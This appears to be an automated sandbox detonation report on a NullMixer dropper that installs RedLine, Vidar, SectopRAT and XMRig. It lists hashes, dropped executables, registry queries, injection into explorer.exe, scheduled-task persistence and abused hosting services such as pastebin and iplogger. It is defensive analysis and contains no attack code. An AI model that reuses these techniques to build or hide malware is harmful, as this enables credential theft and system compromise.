SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/1684-298-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-307-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-306-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/236-305-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-299-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2588-309-0x0000000000400000-0x000000000045B000-memory.dmp

memory/236-302-0x00000000002C0000-0x000000000031B000-memory.dmp

memory/236-301-0x00000000002C0000-0x000000000031B000-memory.dmp

memory/1684-300-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-311-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2240-310-0x0000000000400000-0x0000000002CBF000-memory.dmp

memory/3028-335-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-340-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/956-343-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-341-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/3028-339-0x0000000000400000-0x000000000045B000-memory.dmp

memory/3028-336-0x0000000000240000-0x000000000029B000-memory.dmp

memory/1684-334-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2012-330-0x0000000000400000-0x0000000002C63000-memory.dmp

memory/1684-345-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2240-346-0x0000000000400000-0x0000000002CBF000-memory.dmp

memory/2832-348-0x00000000007E0000-0x00000000007EE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/1424-352-0x000000013FCD0000-0x000000013FCE0000-memory.dmp

memory/2516-357-0x000000013FB90000-0x000000013FB96000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 d20d858a79642c1edbd6ff47238e2ad5
SHA1 b18901c3b4196d70631499ae28483b354a59c865
SHA256 fecd308bff2b98f0c116cd29d6a8b7bfb61b60eca52d18db9a3fc0592a7e0021
SHA512 f56a308c03cb29c18a568ba562accb7ffdaa99837b4c8d449a211c4f97a0453b94e84514793affacdd7b56e9529c5453e7c1929ffc3fcab08cb69e410be475f2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-26 15:00

Reported

2024-11-26 15:02

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4956 set thread context of 3320 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 4796 set thread context of 1852 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe
PID 2620 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe
PID 2620 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe
PID 1724 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe
PID 1724 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe
PID 1724 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe
PID 4532 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe
PID 4532 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe
PID 3280 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe
PID 3280 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe
PID 3280 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe
PID 2268 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe
PID 2268 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe
PID 2268 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe
PID 2040 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe
PID 2040 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe
PID 2040 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe
PID 1128 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe
PID 1128 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe
PID 1128 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe
PID 4204 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 4204 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
